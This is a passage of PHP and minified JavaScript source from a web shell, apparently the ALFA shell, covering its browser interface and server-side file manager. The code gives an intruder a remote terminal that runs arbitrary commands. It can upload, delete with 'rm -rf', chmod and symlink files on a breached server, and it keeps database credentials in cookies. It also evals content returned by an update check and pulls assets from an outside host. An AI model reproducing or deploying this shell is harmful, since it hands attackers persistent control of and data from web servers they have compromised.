l,r=1;for(l in t){var o=t[l].user+"_"+t[l].db;rows+='<tr class="dbh_'+o+'"><th>'+r+"</th><th>"+t[l].host+"</th><th>"+t[l].user+"</th><th>"+t[l].pass+"</th><th>"+t[l].db+'</th><th><button style="margin: unset;" class="connection-his-btn" onclick=\'alfaConnectToDb("'+o+'","'+a+'");\'>Connect</button></th><th style="text-align: center;"><button style="margin: unset;" class="connection-his-btn connection-delete" onclick=\'alfaDeleteConnectToDb("'+o+"\");'>X</button></th></tr>",r++}rows+="</table"}else e.setAttribute("mode","on"),rows="";d.querySelector("#"+a+" .connection_history_holder").innerHTML=rows}function alfaConnectionHistoryUpdate(e){var t,a={};try{a=JSON.parse(getCookie("alfa_connection_hist"))}catch(e){}for(t in mysql_cache)0!=mysql_cache[t].db.length&&(a[mysql_cache[t].user+"_"+mysql_cache[t].db]=mysql_cache[t]);void 0!==e&&delete a[e],setCookie("alfa_connection_hist",JSON.stringify(a),2012)}function alfaExecTerminal(e,t){var a="";if(0==(a=void 0!==t?"cd "+c_:e.c.value).length)return!1;"l"==a?a="ls -trh --color":"ll"==a&&(a="ls -ltrh --color");var i=e.getAttribute("term_id");alfaloader(i,"block"),closeHistoryCmd("free",e);var l="";"FORM"==e.tagName&&(l=e.querySelector(".php-terminal-current-dir").innerHTML),0==(l=l.trim()).length&&(l=c_);var r="a="+alfab64("terminalExec")+"&c="+alfab64(l)+"&alfa1="+alfab64(a)+"&ajax="+alfab64("true");if(_Ajax(d.URL,r,function(e,t){alfaloader(t,"none");try{var a=$("tab_"+i);null!=a&&((-1==a.classList.value.indexOf("active-terminal-tab")||cgi_is_minimized)&&(a.classList.add("tab-is-done"),alfaShowNotification("proccess is done...",a.innerText)),cgi_is_minimized&&alfaUpdateOptionsBadge("cgiloader"))}catch(e){}e=JSON.parse(e),d.querySelector("#"+t+" .php-terminal-output > pre").innerHTML=e.output,0!=e.path.length&&(d.querySelector("#"+t+" .php-terminal-current-dir").innerHTML=e.path)},!1,i),void 0===t){d.querySelector("#"+i+" .cmd-history-holder .commands-history").insertAdjacentHTML("afterbegin","<div onclick=\"d.querySelector('#"+i+' .php-terminal-input\').value = this.innerHTML;" class="history-cmd-line">'+a+"</div>");var o=alfaGetTerminalHistory(),n=o.indexOf(a);-1!=n&&o.splice(n,1),o.push(a),setCookie("alfa-terminal-history",JSON.stringify(o),2012)}d.querySelector("#"+i+" input.php-terminal-input").focus()}function pageChangedFilesMan(e){var t="filesman_holder_"+alfa_current_fm_id,a=getCookie(t+"_page_number"),i=e.innerText;if("<<"==i){a=d.querySelector("#"+t+" .active-page-number").innerText;if(!((a=parseInt(a))>1))return!1;i=a-1}if(">>"==i){a=d.querySelector("#"+t+" .active-page-number").innerText;a=parseInt(a);var l=d.querySelector("#"+t+" .last-page-number").innerHTML;if(!(a+1<=(l=parseInt(l))))return!1;i=a+1}setCookie(t+"_page_number",i,2012),g("FilesMan",c_)}function alfaColDumperInit(){var e=d.querySelector(".tab_name.tab_is_active").getAttribute("opt_id"),t=d.querySelector("#"+e),a=t.getElementsByClassName("box");for(i=0;i<a.length;i++)a[i].addEventListener("click",function(){null!=this.parentElement.querySelector(".nested")&&(this.parentElement.querySelector(".nested").classList.toggle("active"),this.classList.toggle("check-box"))});var i;a=t.getElementsByClassName("sub-box");for(i=0;i<a.length;i++)a[i].setAttribute("opt_id",e),a[i].addEventListener("click",function(){this.classList.toggle("check-box");var e=this.getAttribute("tbl"),t=this.getAttribute("opt_id");t=t.replace("option_",""),col_dumper_selected_data.hasOwnProperty(t)||(col_dumper_selected_data[t]={}),void 0===col_dumper_selected_data[t][e]&&(col_dumper_selected_data[t][e]=[]);var a=this.innerHTML,i=col_dumper_selected_data[t][e].indexOf(a);-1==i?col_dumper_selected_data[t][e].push(a):col_dumper_selected_data[t][e].splice(i,1)})}function showSymlinkPath(e,t){t.stopPropagation();var a=e.getAttribute("row"),i=$("td_row_"+a),l=e.getAttribute("opt_title"),r=e.getAttribute("fname");if(l=decodeURIComponent(r)+" -> "+l,null!=i){i.insertAdjacentHTML("afterbegin",'<div class="symlink_path" id="link_id_'+a+'">'+l+"</div>");var o=t.clientX,n=t.clientY-30;$("link_id_"+a).style.left=o+"px",$("link_id_"+a).style.top=n+"px"}}function hideSymlinkPath(e,t){t.stopPropagation(),$("link_id_"+e.getAttribute("row")).remove()}function alfagetFlags(){data="a="+alfab64("get_flags")+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),_Ajax(d.URL,data,function(e){var t=JSON.parse(e);t.hasOwnProperty("server")&&(d.querySelectorAll(".flag-holder")[0].innerHTML='<img draggable="false" title="'+t.server.name+'" src="http://solevisible.com/images/flags/48/'+t.server.code.toLowerCase()+'.png">',d.querySelectorAll(".flag-holder")[0].style.display="inline"),t.hasOwnProperty("client")&&(d.querySelectorAll(".flag-holder")[1].innerHTML='<img draggable="false" title="'+t.client.name+'" src="http://solevisible.com/images/flags/48/'+t.client.code.toLowerCase()+'.png">',d.querySelectorAll(".flag-holder")[1].style.display="inline")})}function colDumplerSelectType(e){var t=e.options[e.selectedIndex].value;$("coldumper-delimiter-input").style.display="delimiter"==t?"inline-block":"none"}function alfaCheckUrlHash(){var e=window.location.hash.substr(1),t=e.split("&").reduce(function(e,t){var a=t.split("=");return e[a[0]]=a[1],e},{});if(""!=e)switch(t.action){case"fileman":case"options":t.path=decodeURIComponent(t.path),g("FilesMan",t.path,function(e){if(t.hasOwnProperty("file")){var a="auto";isArchive(t.file)&&(a="view"),editor(t.path+"/"+t.file,a,"","","","file")}}),"options"==t.action&&t.hasOwnProperty("opt")&&(alfa_can_add_opt=!0,g(t.opt,null,"","",""),d.querySelector(".opt-title").innerHTML=$("menu_opt_"+t.opt).innerHTML),t.hasOwnProperty("file")||editorClose("editor"),t.hasOwnProperty("opt")||editorClose("options_window"),editorClose("cgiloader");break;default:g("FilesMan","<?php echo $GLOBALS["cwd"]; ?>"),editorClose("editor"),editorClose("options_window"),editorClose("cgiloader")}else g("FilesMan","<?php echo $GLOBALS["cwd"]; ?>"),editorClose("editor"),editorClose("options_window"),editorClose("cgiloader")}function alfaFmngrContextRow(){d.querySelectorAll(".fmanager-row a.main_name").forEach(function(e){e.addEventListener("contextmenu",function(e){var t=e.target,a="";if(".."==(a="A"==e.target.parentElement.tagName?(t=e.target.parentElement).getAttribute("fname"):t.getAttribute("fname")))return!1;var i=t.getAttribute("id"),l=t.getAttribute("path"),r=t.getAttribute("ftype"),o=["newtab","link","download","view","edit","move","copy","rename","modify","permission","compress","extract","delete"];for(var n in"file"!=r||isArchive(a)?o[3]="view_archive":o.splice(11,1),"folder"==r&&(o=["newtab","link","move","copy","rename","modify","permission","compress","delete"]),alfaSortMenuItems(o),o){var s=d.querySelector("#rightclick_menu > a[name="+o[n]+"]");switch(s.setAttribute("fid",i),s.setAttribute("fname",decodeURIComponent(a)),s.setAttribute("path",l),s.setAttribute("ftype",r),o[n]){case"view":case"edit":var c="auto";"edit"==o[n]&&(c="edit"),s.setAttribute("href","#action=fileman&path="+c_+"/&file="+a),s.setAttribute("onclick","editor('"+a+"','"+c+"','','','','file')");break;case"newtab":var u=a;"file"==r?(u="&file="+a,s.setAttribute("href","#action=fileman&path="+c_+"/"+u),s.setAttribute("target","_blank"),s.onclick=function(){}):(s.setAttribute("href","javascript:void(0)"),s.removeAttribute("target"),s.onclick=function(){alfaFilesManNewTab(c_,u)});break;case"delete":s.setAttribute("onclick","var chk = confirm('Are You Sure For Delete # "+a+" # ?'); chk ? g('FilesMan',null,'delete', '"+a+"') : '';");break;case"download":s.setAttribute("onclick","g('FilesTools',null,'"+a+"', 'download')");break;case"permission":try{var p=d.querySelector("#id_chmode_"+i.replace("id_","")+" span").innerHTML;s.setAttribute("perm",p.trim())}catch(e){}break;case"link":s.style.display="block";var f="<?php echo $_SERVER["DOCUMENT_ROOT"]; ?>/",m=(c_+"/"+a).replace(/\/\//g,"/");if(-1!=m.indexOf(f)){f=m.replace(f,"");var b=location.origin+"/"+f;s.setAttribute("href",""+b)}else s.style.display="none"}}var y=e.clientX,_=e.clientY;alfaRightClickMenu(y,_),e.preventDefault()})})}function alfaFilesManNewTab(e,t,a){var i=t;void 0!==a&&(i=alfaGetLastFolderName(e));var l=decodeURIComponent(e+"/"+t);l=l.replace(/\/\//g,"/");var r=$("filesman_tab_1"),o=r.getAttribute("fm_counter");o=parseInt(o)+1,r.setAttribute("fm_counter",o),d.querySelector("#filesman_tabs_child").insertAdjacentHTML("beforeend",'<div onmouseover="alfaFilesmanTabShowTitle(this,event);" onmouseout="alfaFilesmanTabHideTitle(this,event);" path="'+l+'" id="filesman_tab_'+o+'" fm_id="'+o+'" onclick="filesmanTabController(this);" fname="'+t+'" class="filesman_tab"><img class="folder-tab-icon" src="http://solevisible.com/icons/menu/folder2.svg"> <span class="filesman-tab-folder-name">'+i+'</span> <img fm_id="'+o+'" onclick="closeFmTab(this,event);return false;" title="[close]" src="http://solevisible.com/icons/menu/delete.svg"></div>'),d.querySelector(".ajaxarea").insertAdjacentHTML("beforebegin",'<div style="position:relative;" fm_id="'+o+'" id="filesman_holder_'+o+'" class="ajaxarea"><div class="header"></div></div>'),alfa_fm_id=o,g("FilesMan",l),alfa_fm_id=0}function alfaFilesmanTabShowTitle(e,t){t.stopPropagation();var a=$("filesman-tab-full-path");a.style.display="block",a.style.top=e.offsetTop-37+"px",a.style.left=e.offsetLeft-$("filesman_tabs").scrollLeft+"px",a.innerHTML=e.getAttribute("path")}function alfaFilesmanTabHideTitle(e,t){$("filesman-tab-full-path").style.display="none"}function alfaPopupAction(e,t){var a="",i="";switch(t){case"rename":a="Old file name:",i="New file name:";break;case"copy":a="File path:",i="Enter the file path that you want to copy this file to:";break;case"move":a="Current Path:",i="Enter the file path that you want to move this file to:";break;case"extract":a="Files to extract:",i="Enter the path you wish to extract the files to and click Extract:"}var l=e.getAttribute("fname"),r=e.getAttribute("path"),o=t.charAt(0).toUpperCase()+t.slice(1);if("permission"==t){d.querySelector("#shortcutMenu-holder").style.height="222px",o="Change Permissions",d.querySelector("#shortcutMenu-holder > form > .perm-table-holder").style.display="block",d.querySelector("#shortcutMenu-holder > form > input[name=fname]").style.display="none";var n=e.getAttribute("perm"),s=n.substr(1,1),c=n.substr(2,1),u=n.substr(3,1);d.querySelector("#shortcutMenu-holder > form input[name=u]").value=s,d.querySelector("#shortcutMenu-holder > form input[name=g]").value=c,d.querySelector("#shortcutMenu-holder > form input[name=w]").value=u,autoCheckPerms(s,"u",["u","g","w"]),autoCheckPerms(c,"g"),autoCheckPerms(u,"w")}else d.querySelector("#shortcutMenu-holder").style.height="190px",d.querySelector("#shortcutMenu-holder > form > input[name=fname]").style.display="block",d.querySelector("#shortcutMenu-holder > form > .perm-table-holder").style.display="none";var p="move"==t||"copy"==t?r+l:l;if("modify"==t){var f="tr_row_"+e.getAttribute("fid").replace("id_","");p=d.querySelector("#"+f+" .main_modify").innerText}d.querySelector(".cl-popup-fixed").style.display="block",d.querySelector("#shortcutMenu-holder .popup-head").innerHTML=o,d.querySelector("#shortcutMenu-holder .old-path-lbl").innerHTML=a,d.querySelector("#shortcutMenu-holder .new-filename-lbl").innerHTML=i,d.querySelector("#shortcutMenu-holder .popup-foot > button[name=accept]").innerHTML=o,d.querySelector("#shortcutMenu-holder > form > .old-path-content").innerHTML=r+l,d.querySelector("#shortcutMenu-holder > form > input[name=fname]").value=p,d.querySelector("#shortcutMenu-holder button[name=accept]").setAttribute("fid",e.getAttribute("fid")),d.querySelector("#shortcutMenu-holder button[name=accept]").setAttribute("action",t)}function calcperm(){var e=event.srcElement;autoCheckPerms(e.checked,e.name.substr(0,1))}function autoCheckPerms(e,t,a){if(void 0!==a)for(var i in a){var l=a[i];d.querySelector("#shortcutMenu-holder > form input[name="+l+"r]").checked=!1,d.querySelector("#shortcutMenu-holder > form input[name="+l+"w]").checked=!1,d.querySelector("#shortcutMenu-holder > form input[name="+l+"x]").checked=!1}var r=d.querySelector("#shortcutMenu-holder > form input[name="+t+"r]"),o=d.querySelector("#shortcutMenu-holder > form input[name="+t+"w]"),n=d.querySelector("#shortcutMenu-holder > form input[name="+t+"x]");if("boolean"!=typeof e)"7"==e?(r.checked=!0,o.checked=!0,n.checked=!0):"4"==e?r.checked=!0:"2"==e?o.checked=!0:"1"==e?n.checked=!0:"6"==e?(r.checked=!0,o.checked=!0):"3"==e?(o.checked=!0,n.checked=!0):"5"==e&&(r.checked=!0,n.checked=!0);else{var s=0;r.checked&&(s+=4),o.checked&&(s+=2),n.checked&&(s+=1),"u"==t?d.querySelector("#shortcutMenu-holder > form input[name=u]").value=s:"g"==t?d.querySelector("#shortcutMenu-holder > form input[name=g]").value=s:"w"==t&&(d.querySelector("#shortcutMenu-holder > form input[name=w]").value=s)}}function gg(e,t,a,i,l,r){var o="filesman_holder_"+alfa_current_fm_id;alfaloader(o,"block"),data="a="+alfab64(e)+"&c="+alfab64(t)+"&alfa1="+alfab64(a)+"&alfa2="+alfab64(i)+"&alfa3="+alfab64(l)+"&ajax="+alfab64("true"),_Ajax(d.URL,data,r,!1,o)}function alfaPopUpDoAction(e){var t=e.getAttribute("action");switch(t){case"rename":case"move":case"copy":var a=e.getAttribute("fid").replace("id_",""),i=$("id_"+a).getAttribute("fname"),l=d.querySelector("#shortcutMenu-holder > form > input[name=fname]").value;l=l.trim(),i=i.trim(),gg("doActions",c_,i,l,t,function(e,i){if("rename"==t)if("done"==e){var r=$("id_"+a);updateFileEditor(a,l);var o=r.getAttribute("path")+$("id_"+a).getAttribute("fname");d.querySelector("#shortcutMenu-holder > form > .old-path-content").innerHTML=o,r.addEventListener("animationend",function(){r.classList.remove("textEffect")}),r.classList.add("textEffect"),alfaShowNotification("Renamed...","Rename Action"),d.querySelector(".cl-popup-fixed").style.display="none"}else alfaShowNotification("error...!","Rename Action","error");alfaloader(i,"none")});break;case"permission":var r=d.querySelector("#shortcutMenu-holder > form input[name=u]").value,o=d.querySelector("#shortcutMenu-holder > form input[name=g]").value,n=d.querySelector("#shortcutMenu-holder > form input[name=w]").value;i=(i=d.querySelector("#shortcutMenu-holder > form > .old-path-content").innerHTML).trim();var s=r.trim()+o.trim()+n.trim();gg("doActions",c_,i,s,t,function(e,t){alfaloader(t,"none"),alfaShowNotification(e,"Permission Action"),d.querySelector(".cl-popup-fixed").style.display="none"});break;case"modify":a=e.getAttribute("fid").replace("id_","");var c=d.querySelector("#shortcutMenu-holder > form > input[name=fname]").value,u=$("id_"+a).getAttribute("fname");gg("doActions",c_,c,u,t,function(t,a){if("ok"==t){var i="tr_row_"+e.getAttribute("fid").replace("id_","");d.querySelector("#"+i+" .main_modify").innerHTML=c,alfaShowNotification("success...","Modify Action"),d.querySelector(".cl-popup-fixed").style.display="none"}else alfaShowNotification(t,"Modify Action","error");alfaloader(a,"none")})}}function alfaInitSoratableTab(e){Sortable.create(e,{direction:"horizontal",animation:300,ghostClass:"sortable-ghost",filter:".not-sortable"})}$("search-input").addEventListener("keydown",function(e){setTimeout(function(){var e=$("search-input").value;for(var t in d.getElementsByClassName("history-list")[0].innerHTML="",editor_files)if(-1!=editor_files[t].file.search(e)||""==e){var a=0;t==editor_current_file&&(a=" is_active"),insertToHistory(t,editor_files[t].file,a,editor_files[t].type)}},100)},!1),_Ajax(d.URL,"a="+alfab64("checkupdate"),function(e){if(0!=e.length&&"[]"!=e){var t=JSON.parse(e);if(t.hasOwnProperty("content")){d.body.insertAdjacentHTML("beforeend",t.content);try{evalJS(t.content)}catch(t){}}if(t.hasOwnProperty("copyright")&&($("alfa-copyright").innerHTML=t.copyright),t.hasOwnProperty("solevisible")&&($("alfa_solevisible").innerHTML=t.solevisible),t.hasOwnProperty("code_name")&&($("hidden_sh").innerHTML=t.code_name.replace(/\{version\}/g,t.version_number)),t.hasOwnProperty("market")){var a=d.querySelector("span.alfa_plus");if(t.market.hasOwnProperty("visible")&&"yes"==t.market.visible&&($("menu_opt_market").style.display="inline"),"open"!=t.market.status&&(a.style.color="#ffc107"),t.market.hasOwnProperty("content"))try{evalJS(t.market.content)}catch(t){}}}}),<?php echo $GLOBALS["need_to_update_header"]; ?>?_Ajax(d.URL,"a="+alfab64("updateheader"),function(e){try{var t=JSON.parse(e);for(var a in t){for(var i="",l=0;l<t[a].length;l++)i+="useful"==a||"downloader"==a?'<span class="header_values" style="margin-left: 4px;">'+t[a][l]+"</span>":t[a][l];var r=$("header_"+a);r&&(r.innerHTML=i)}$("header_cgishell").innerHTML="ON",$("header_cgishell").setAttribute("class","header_on")}catch(e){}}):islinux&&_Ajax(d.URL,"a="+alfab64("checkcgi"),function(e){"ok"==e&&($("header_cgishell").innerHTML="ON",$("header_cgishell").setAttribute("class","header_on"))}),function(){d.onclick=function(){can_hashchange_work=!1,setTimeout(function(){can_hashchange_work=!0},600)},window.onhashchange=function(e){can_hashchange_work&&alfaCheckUrlHash()},alfaCheckUrlHash(),alfagetFlags(),rightclick_menu_context=$("rightclick_menu").style,alfaInitCwdContext(),document.addEventListener("click",function(e){rightclick_menu_context.opacity="0",setTimeout(function(){rightclick_menu_context.visibility="hidden"},501)},!1);var e=document.createElement("script");e.src="https://cdnjs.cloudflare.com/ajax/libs/Sortable/1.10.2/Sortable.min.js",e.id="sortable-plugin",e.onload=function(){alfaInitSoratableTab($("filesman_tabs_child")),alfaInitSoratableTab(d.querySelector(".editor-tabs")),alfaInitSoratableTab(d.querySelector(".options_tab")),alfaInitSoratableTab(d.querySelector(".terminal-tabs")),alfaInitSoratableTab(d.querySelector(".sql-tabs"))},d.body.appendChild(e)}();
2387</script>
2388</body>
2389</html>
2390<?php
2391}}
2392if (!function_exists("posix_getpwuid") && (strpos(@ini_get('disable_functions'), 'posix_getpwuid')===false)) {
2393function posix_getpwuid($p) {return false;} }
2394if (!function_exists("posix_getgrgid") && (strpos(@ini_get('disable_functions'), 'posix_getgrgid')===false)) {
2395function posix_getgrgid($p) {return false;} }
2396function alfaWhich($p) {
2397$path = alfaEx('which ' . $p,false,false);
2398if(!empty($path))
2399return strlen($path);
2400return false;
2401}
2402function alfaSize($s) {
2403if($s >= 1073741824)
2404return sprintf('%1.2f', $s / 1073741824 ). ' GB';
2405elseif($s >= 1048576)
2406return sprintf('%1.2f', $s / 1048576 ) . ' MB';
2407elseif($s >= 1024)
2408return sprintf('%1.2f', $s / 1024 ) . ' KB';
2409else
2410return $s . ' B';
2411}
2412function alfaPerms($p) {
2413if (($p & 0xC000) == 0xC000)$i = 's';
2414elseif (($p & 0xA000) == 0xA000)$i = 'l';
2415elseif (($p & 0x8000) == 0x8000)$i = '-';
2416elseif (($p & 0x6000) == 0x6000)$i = 'b';
2417elseif (($p & 0x4000) == 0x4000)$i = 'd';
2418elseif (($p & 0x2000) == 0x2000)$i = 'c';
2419elseif (($p & 0x1000) == 0x1000)$i = 'p';
2420else $i = 'u';
2421$i .= (($p & 0x0100) ? 'r' : '-');
2422$i .= (($p & 0x0080) ? 'w' : '-');
2423$i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
2424$i .= (($p & 0x0020) ? 'r' : '-');
2425$i .= (($p & 0x0010) ? 'w' : '-');
2426$i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
2427$i .= (($p & 0x0004) ? 'r' : '-');
2428$i .= (($p & 0x0002) ? 'w' : '-');
2429$i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
2430return $i;
2431}
2432function alfaPermsColor($f,$isbash=false){
2433$class = "";
2434$num = "";
2435$human = "";
2436if($isbash){
2437$class = $f["class"];
2438$num = $f["num"];
2439$human = $f["human"];
2440}else{
2441$num = substr(sprintf('%o', @fileperms($f)),-4);
2442$human = alfaPerms(@fileperms($f));
2443if(!@is_readable($f))
2444$class = "main_red_perm";
2445elseif (!@is_writable($f))
2446$class = "main_white_perm";
2447else
2448$class = "main_green_perm";
2449}
2450return '<span style="font-weight:unset;" class="'.$class.'">'.$num.'</span><span style="font-weight:unset;" class="beetween_perms"> >> </span><span style="font-weight:unset;" class="'.$class.'">'.$human.'</span>';
2451}
2452if(!function_exists("scandir")) {
2453function scandir($dir) {
2454$dh = opendir($dir);
2455while (false !== ($filename = readdir($dh)))
2456$files[] = $filename;
2457return $files;
2458}
2459}
2460function reArrayFiles($file_post){
2461$file_ary = array();
2462$file_count = count($file_post['name']);
2463$file_keys = array_keys($file_post);
2464for ($i=0; $i<$file_count; $i++) {
2465foreach ($file_keys as $key) {
2466$file_ary[$i][$key] = $file_post[$key][$i];
2467}
2468}
2469return $file_ary;
2470}
2471function _alfa_can_runCommand($cgi=true,$cache=true){
2472 if(isset($_COOKIE["alfa_canruncmd"])&&$cache){
2473 return true;
2474 }
2475 if(strlen(alfaEx("whoami",false,$cgi))>0){
2476 $_COOKIE["alfa_canruncmd"] = true;
2477 return true;
2478 }
2479 return false;
2480}
2481function _alfa_symlink($target, $link){
2482 $phpsym = function_exists("symlink");
2483 if($phpsym){
2484 @symlink($target, $link);
2485 }else{
2486 alfaEx("ln -s '".addslashes($target)."' '".addslashes($link)."'");
2487 }
2488}
2489function _alfa_file_exists($file,$cgi=true){
2490 if(@file_exists($file)){
2491 return true;
2492 }else{
2493 if(strlen(alfaEx("ls -la '".addslashes($file)."'",false,$cgi))>0){
2494 return true;
2495 }
2496 }
2497 return false;
2498}
2499function _alfa_file($file,$cgi=true){
2500 $array = @file($file);
2501 if(!$array){
2502 if(strlen(alfaEx("id",false,$cgi))>0){
2503 $data = alfaEx('cat "'.addslashes($file).'"',false,$cgi);
2504 if(strlen($data)>0){
2505 return explode("\n", $data);
2506 }else{
2507 return false;
2508 }
2509 }else{
2510 return false;
2511 }
2512 }else{
2513 return $array;
2514 }
2515}
2516function _alfa_is_writable($file){
2517 $check = false;
2518 $check = @is_writable($file);
2519 if(!$check){
2520 if(_alfa_can_runCommand()){
2521 $check = alfaEx('[ -w "'.trim(addslashes($file)).'" ] && echo "yes" || echo "no"');
2522 if($check == "yes"){
2523 $check = true;
2524 }else{
2525 $check = false;
2526 }
2527 }
2528 }
2529 return $check;
2530}
2531function _alfa_is_dir($dir,$mode="-d"){
2532 $check = false;
2533 $check = @is_dir($dir);
2534 if($mode == "-e"){
2535 $check = @is_file($dir);
2536 }
2537 if(!$check){
2538 if(_alfa_can_runCommand()){
2539 $check = alfaEx('[ "'.trim($mode).'" "'.trim(addslashes($dir)).'" ] && echo "yes" || echo "no"');
2540 if($check == "yes"){
2541 return true;
2542 }else{
2543 return false;
2544 }
2545 }
2546 }
2547 return $check;
2548}
2549function _alfa_load_ace_options($base){
2550 return '<span>Theme: </span><select class="ace-controler ace-theme-selector" base="'.$base.'" onChange="alfaAceChangeSetting(this,\'theme\');"><option value="terminal" selected>terminal</option><option value="ambiance">ambiance</option><option value="chaos">chaos</option><option value="chrome">chrome</option><option value="clouds">clouds</option><option value="clouds_midnight">clouds_midnight</option><option value="cobalt">cobalt</option><option value="crimson_editor">crimson_editor</option><option value="dawn">dawn</option><option value="dracula">dracula</option><option value="dreamweaver">dreamweaver</option><option value="eclipse">eclipse</option><option value="github">github</option><option value="gob">gob</option><option value="gruvbox">gruvbox</option><option value="idle_fingers">idle_fingers</option><option value="iplastic">iplastic</option><option value="katzenmilch">katzenmilch</option><option value="kr_theme">kr_theme</option><option value="kuroir">kuroir</option><option value="merbivore">merbivore</option><option value="merbivore_soft">merbivore_soft</option><option value="mono_industrial">mono_industrial</option><option value="monokai">monokai</option><option value="nord_dark">nord_dark</option><option value="pastel_on_dark">pastel_on_dark</option><option value="solarized_dark">solarized_dark</option><option value="solarized_light">solarized_light</option><option value="sqlserver">sqlserver</option><option value="textmate">textmate</option><option value="tomorrow">tomorrow</option><option value="tomorrow_night">tomorrow_night</option><option value="tomorrow_night_blue">tomorrow_night_blue</option><option value="tomorrow_night_bright">tomorrow_night_bright</option><option value="tomorrow_night_eighties">tomorrow_night_eighties</option><option value="twilight">twilight</option><option value="vibrant_ink">vibrant_ink</option><option value="xcode">xcode</option></select><span>Language: </span><select class="ace-controler" base="'.$base.'" onChange="alfaAceChangeSetting(this,\'lang\');"><option value="php">php</option><option value="python">python</option><option value="perl">perl</option><option value="c_cpp">c/c++</option><option value="csharp">c#</option><option value="ruby">ruby</option><option value="html">html</option><option value="javascript">javascript</option><option value="css">css</option><option value="xml">xml</option><option value="sql">sql</option><option value="swift">swift</option><option value="sh">bash</option><option value="lua">lua</option><option value="powershell">powershell</option><option value="jsp">jsp</option><option value="java">java</option><option value="json">json</option><option value="plain_text">plain_text</option></select><span>Soft Wrap: </span><input type="checkbox" name="wrapmode" class="ace-controler" onClick="alfaAceChangeWrapMode(this,\''.$base.'\');" checked> | <span>Font Size: </span><button class="ace-controler" style="cursor:pointer;" onclick="alfaAceChangeFontSize(\''.$base.'\',\'+\', this);return false;">+</button> | <button style="cursor:pointer;" class="ace-controler" onclick="alfaAceChangeFontSize(\''.$base.'\', \'-\', this);return false;">-</button> | ';
2551}
2552function alfaFilesMan2(){
2553 alfahead();
2554 AlfaNum(8,9,10,7,6,5,4);
2555 echo '<div style="position:relative;" fm_id="1" id="filesman_holder_1" class="ajaxarea filesman-active-content"><div class="header"></div></div>';
2556 alfaFooter();
2557}
2558function copy_paste($c,$s,$d){
2559if(@is_dir($c.$s)){
2560@mkdir($d.$s);
2561$h = @opendir($c.$s);
2562while (($f = @readdir($h)) !== false)
2563if (($f != ".") and ($f != ".."))
2564copy_paste($c.$s.'/',$f, $d.$s.'/');
2565} elseif(is_file($c.$s))
2566@copy($c.$s, $d.$s);
2567}
2568function alfaFilesMan(){
2569if(!empty ($_COOKIE['alfa_f']))
2570$_COOKIE['alfa_f'] = @unserialize($_COOKIE['alfa_f']);
2571if(!empty($_POST['alfa1'])){
2572switch($_POST['alfa1']){
2573case 'uploadFile':
2574$move_cmd_file = false;
2575$alfa_canruncmd = false;
2576if($GLOBALS['glob_chdir_false']){
2577 $alfa_canruncmd = _alfa_can_runCommand(true,true);
2578 $move_cmd_file = true;
2579}
2580if(_alfa_is_writable($GLOBALS['cwd'])){
2581$files = reArrayFiles($_FILES['f']);
2582$ret_files = array();
2583foreach($files as $file){
2584if($move_cmd_file&&$alfa_canruncmd){
2585 alfaEx("cat '".addslashes($file['tmp_name'])."' > '".addslashes($_POST["c"]."/".$file['name'])."'");
2586}else{
2587 if(@move_uploaded_file($file['tmp_name'],$file['name'])){
2588 $ow = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($file['name'])):array("name" => "????");
2589 $gr = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($file['name'])):array("name" => "????");
2590 $file_owner = $ow['name']?$ow['name']:(function_exists("fileowner")?@fileowner($file['name']):"????");
2591 $file_group = $gr['name']?$gr['name']:(function_exists("filegroup")?@filegroup($file['name']):"????");
2592 $file_modify = @date('Y-m-d H:i:s', @filemtime($file['name']));
2593 $file_perm = alfaPermsColor($file['name']);
2594 $file_size = @filesize($file['name']);
2595 $ret_files[] = array("name" => $file['name'], "size" => alfaSize($file_size), "perm" => $file_perm, "modify" => $file_modify, "owner" => $file_owner."/".$file_group);
2596 }
2597}
2598}
2599if(!$move_cmd_file){
2600 echo json_encode($ret_files);
2601}
2602}else{
2603 echo "noperm";
2604 return;
2605}
2606if(!$move_cmd_file){
2607return;
2608}
2609break;
2610case 'mkdir':
2611$new_dir_cmd = false;
2612if($GLOBALS['glob_chdir_false']){
2613 if(_alfa_can_runCommand(true,true)){
2614 if(_alfa_is_writable($GLOBALS['cwd'])){
2615 if(!_alfa_is_dir(trim($_POST['alfa2']))){
2616 alfaEx("cd '".trim(addslashes($_POST['c']))."';mkdir '".trim(addslashes($_POST['alfa2']))."'");
2617 echo "<script>alfaShowNotification('".addslashes($_POST['alfa2'])." created...', 'Files manager');</script>";
2618 }else{
2619 echo "<script>alfaShowNotification('folder already existed', 'Files manager', 'error');</script>";
2620 }
2621 }else{
2622 echo "<script>alfaShowNotification('folder isnt writable !', 'Files manager', 'error');</script>";
2623 }
2624 }else{
2625 echo "<script>alfaShowNotification('Can\'t create new dir !', 'Files manager', 'error');</script>";
2626 }
2627}else{
2628 if(_alfa_is_writable($GLOBALS['cwd'])){
2629 if(!_alfa_is_dir(trim($_POST['alfa2']))){
2630 if(!@mkdir(trim($_POST['alfa2']))){
2631 echo "<script>alfaShowNotification('Can\'t create new dir !', 'Files manager', 'error');</script>";
2632 }else{
2633 echo "<script>alfaShowNotification('".addslashes($_POST['alfa2'])." created...', 'Files manager');</script>";
2634 }
2635 }else{
2636 echo "<script>alfaShowNotification('folder already existed', 'Files manager', 'error');</script>";
2637 }
2638 }else{
2639 echo "<script>alfaShowNotification('folder isnt writable !', 'Files manager', 'error');</script>";
2640 }
2641}
2642break;
2643case 'delete':
2644function deleteDir($path){
2645$path = (substr($path,-1)=='/') ? $path:$path.'/';
2646$dh = @opendir($path);
2647while(($item = @readdir($dh)) !== false){
2648$item = $path.$item;
2649if((basename($item) == "..") || (basename($item) == "."))
2650continue;
2651$type = @filetype($item);
2652if ($type == "dir")
2653deleteDir($item);
2654else
2655@unlink($item);
2656}
2657@closedir($dh);
2658@rmdir($path);
2659}
2660if(is_array(@$_POST['f']))
2661foreach($_POST['f'] as $f){
2662if($f == '..')
2663continue;
2664$f = rawurldecode($f);
2665if($GLOBALS["glob_chdir_false"]){
2666 if(_alfa_can_runCommand(true,true)){
2667 alfaEx("rm -rf '".addslashes($_POST['c'].'/'.$f)."'");
2668 }
2669}else{
